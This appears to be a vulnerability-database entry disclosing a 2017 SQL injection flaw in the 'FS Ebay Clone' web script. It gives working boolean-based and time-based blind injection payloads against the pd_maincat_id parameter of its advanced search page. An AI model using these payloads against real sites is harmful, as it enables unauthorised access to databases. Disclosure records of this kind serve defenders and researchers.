vendor:
Ebay Clone
by:
8bitsec
N/A
CVSS
N/A
SQL Injection
Unknown
CWE
Product Name: Ebay Clone
Affected Version From: 23 October 17
Affected Version To: 23 October 17
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017
FS Ebay Clone – SQL Injection
SQL injection on [pd_maincat_id] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/advance-search-result.php?keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search Parameter: pd_maincat_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: keywords=any&pd_maincat_id=1' AND SLEEP(5) AND 'aHHy'='aHHy&submit=Search
Mitigation:
Unknown